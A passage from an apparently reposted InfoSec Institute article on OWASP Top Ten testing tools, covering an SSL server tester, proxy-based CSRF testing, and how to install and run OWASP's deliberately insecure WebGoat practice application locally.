is still a good choice: it’s open source and maintained by an active community. For more information, please see: http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Main_Page [h=2]Sensitive Data Exposure Utility: Qualsys SSL Server Tester[/h] I normally avoid web-based tools for application scanning for several reasons: the data may not just be reported back to me, they might be pulled or changed at any time and they need to hit an Internet-facing application. However, I recommend Qualsys’s SSL Server Tester page to test the quality of your web application’s HTTPS connection before and after deployment into production. Qualsys tests for basic quality issues such as whether your server supports SSL 2.0, which ciphers are supported, and the strength of your server certificate. It also tests more advanced quality measures such as whether or not client-initiated renegotiation is allowed and whether or not the BEAST attack would be mitigated. For more information, please see: https://www.ssllabs.com/ssltest/index.html (This is a resource hosted by a third party. For maximum protection, only allow traffic from “ssllabs.com” to the target resource until the necessary issues are resolved.) [h=2]CSRF Utility: Tamper Data (Samurai WTF)[/h] A Tamper Data utility is available in the Samurai WTF collection and is part of Russ McRee’s coverage of CSRF utilities in his 2010 security tools review. The “Tamper Data” plug-in for Firefox is not currently recommended because of ongoing stability issues with recent versions of Firefox. Instead, I currently recommend configuring Firefox (or Chrome or any other web browser) to use a web proxy such as WebScarab or ZAP, and then use the functions within the web proxy to manipulate individual cookies, headers, form fields and URLs. [h=2]WebGoat: The Perfect Target[/h] In addition to the top ten web vulnerability list, OWASP develops and distributes software that allows students and security professionals to practice their skills against a deliberately insecure web application. The name of OWASP’s tilting dummy is “WebGoat,” and it is available in both .NET and Java editions. [h=3]How to Download, Install and Set Up WebGoat on Windows[/h] Although there is a .NET edition of WebGoat available for Windows platforms, I’ll stick with the Java edition in this article because the edition supports Linux and Mac OS platforms in addition to Windows. The Java edition also appears to be the more actively developed applications, as its official ambitions include growing into a security benchmarking platform and a honeypot. [h=3]WebGoat Prerequisites[/h] The Java edition of WebGoat requires Java, of course, and uses Tomcat to provide its web interface. Download and install Oracle Java from http://www.java.com Java Version 1.6 (a.k.a. “Java 6?) is recommended [*] Download and install Tomcat from http://tomcat.apache.org/ Tomcat Version 6 is recommended Tomcat Version 7 is supported but requires additional setup not documented here Once installed, open http://localhost:8080/ to confirm that Tomcat is working Once you confirm the service is working, stop the Tomcat service [h=3]How to Install WebGoat[/h] Download and unzip WebGoat from http://code.google.com/p/webgoat/downloads/list Download the “Zip” file and unpack the contents into a local folder [*] Open your local folder and double-click “webgoat.bat” A Java window labeled “Tomcat” will open and display messages Once the “Server startup in XXXXX ms” message appears, open http://localhost to confirm that you are hitting a live Tomcat application on port 80 Next, test WebGoat by opening http://localhost/WebGoat/attack. Sign on with username “guest” and password “guest” when prompted. [h=3]How to Run WebGoat[/h] Start WebGoat by opening http://localhost/WebGoat/attack. Sign on with username “guest” and password “guest” when prompted. Click the “Start WebGoat” button. Sursa: InfoSec Institute Resources – OWASP Top Ten Testing and Tools for 2013
×
×
  • Create New...